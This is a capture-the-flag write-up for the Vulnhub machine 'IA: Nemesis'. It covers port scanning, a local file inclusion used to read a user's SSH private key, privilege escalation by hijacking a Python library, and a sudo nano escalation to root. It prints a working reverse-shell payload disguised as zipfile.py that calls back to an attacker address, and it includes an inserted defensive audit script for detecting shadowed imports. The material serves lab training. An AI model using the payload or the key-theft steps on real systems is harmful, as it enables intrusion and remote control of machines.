IA: Nemesis Vulnhub Writeup

Difficulty: Medium/Hard

NMAP:

Nice, some ports are open, and SSH is on port 52846. Let’s browse.

But there is nothing interesting here. We notice that port 52845 is HTTP, so let’s browse it.

Now let’s enumerate the site in the browser, and we can find something interesting.

Let’s move on to “Contact us”. We can write input here, so can we do a command injection?

LFI:

Nice and we have username!

thanos and carlos are the users, so we can try to find the RSA key at the following path, /home/thanos/.ssh/id_rsa, and try to log in over SSH!!

And we have the KEY!!!!!! Save it in a file named id_rsa, set the permissions with chmod 600 id_rsa, and let’s log in over SSH!!

GOT FIRST FLAG!! Now let’s enumerate!

User Enumeration:

We find the file “backup.py”. At this moment I got stuck, but thank you Google! I found how to bypass this step!

Privilege Escalation:

https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

import os
import pty
import socket

lhost = "10.2.0.3"
lport = 4444

# Stand-ins for the names a caller expects to find in the real zipfile module
ZIP_DEFLATED = 0

class ZipFile:
    def close(*args):
        return

    def write(*args):
        return

    def __init__(self, *args):
        return

# Runs at import time, as the user that executes the importing script
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", "/dev/null")
pty.spawn("/bin/bash")
s.close()

After creating our script, give it execute permission with chmod +x zipfile.py and listen with netcat!

We notice that the file “backup.py” is executed every minute! So just listen on the port!
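Seen from the defender's side, this step works because Python puts the script's own directory first on sys.path, so a zipfile.py sitting beside a scheduled script is imported instead of the standard-library module. The check below is an added example, not part of the original writeup: the function names, finding labels and the temporary-directory layout (a backup.py that imports zipfile, next to an empty zipfile.py) are constructed assumptions.

```python
import ast
import importlib.util
import os
import stat
import sys
import tempfile

def imported_modules(script_path):
    """Top-level module names the script imports (absolute imports only)."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

def dir_is_risky(st_uid, st_mode, run_as_uid):
    """True if someone other than root or the job's user can add files to the directory."""
    return st_uid not in (0, run_as_uid) or bool(st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(script_path, run_as_uid):
    """Findings for a script that a scheduled job runs as run_as_uid."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    st = os.stat(script_dir)
    risky = dir_is_risky(st.st_uid, st.st_mode, run_as_uid)
    findings = [("untrusted-writable-dir", script_dir)] if risky else []
    for name in sorted(imported_modules(script_path)):
        if name in sys.builtin_module_names:
            continue  # built-ins are resolved before sys.path is searched
        local = [os.path.join(script_dir, f) for f in (name + ".py", name + "/__init__.py")]
        hit = next((p for p in local if os.path.exists(p)), None)
        spec = importlib.util.find_spec(name)
        # The script's directory is sys.path[0], so a local file beats the real module.
        if hit and spec and spec.origin and os.path.dirname(spec.origin) != script_dir:
            findings.append(("shadowed-import", hit))
    return findings

def demo():
    # Constructed sample layout; the zipfile.py created here is an empty file.
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "backup.py"), "w") as fh:
        fh.write("import os\nfrom zipfile import ZipFile, ZIP_DEFLATED\n")
    open(os.path.join(d, "zipfile.py"), "w").close()
    return audit(os.path.join(d, "backup.py"), run_as_uid=os.getuid()), d

if __name__ == "__main__":
    print(demo()[0])
```

Either finding on a script run from cron means the job should be moved to a directory that only root or the job's own user can write to.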

Nice, we got the second flag!!!! Now let’s go root this box!

We have a hint in the file root.txt! So let’s look at this file!

As we can see, this hash is encrypted with affine encryption!!! So we need to search Google for “affine cipher decrypt”!

And we finally found the password! But it didn’t work for root, so we can use it for carlos to look for sudo vulnerabilities!

Vertical Privilege Escalation:

Go to GTFOBins and find “nano”

Command: sudo /bin/nano /opt/priv

BUT! To do this, first get a shell as thanos, then run su carlos and enter the password.

ROOT!

I hope this is useful! Follow me on Twitter too: @0xJin

Jin


| eCPTX | C|EH Master | CompTIA Security + | eJPT |
